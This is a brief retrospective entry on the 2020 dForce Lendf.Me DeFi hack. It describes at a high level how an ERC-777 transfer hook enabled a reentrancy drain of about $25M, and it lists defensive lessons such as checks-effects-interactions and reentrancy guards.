dForce Lending
HackedDeFi · born 2019 · ✝ 2020
An ERC-777 callback drained the pool, then the hacker returned it.
dForce ran a lending protocol (Lendf.Me) on Ethereum that accepted imBTC, an ERC-777 token. In 2020 an attacker used the token's transfer callback to mount a reentrancy attack and drain roughly $25M.
- Peak
- ~$25M stolen
- Cause
- Hacked
- Year of death
- 2020
☠️ Cause of death
imBTC's ERC-777 transfer hook let the attacker reenter the deposit/withdraw flow before balances updated, repeatedly inflating their accounted collateral until the pool was empty.
📓 Lessons left behind
- —ERC-777 transfer hooks reintroduce reentrancy into 'safe' code.
- —Follow checks-effects-interactions on every external call.
- —Vet every token standard a protocol chooses to support.
🌱 The idea that survived
Reentrancy guards
Cemented checks-effects-interactions and reentrancy locks as defaults when handling callback-capable tokens.
#defi#lending#reentrancy#ethereum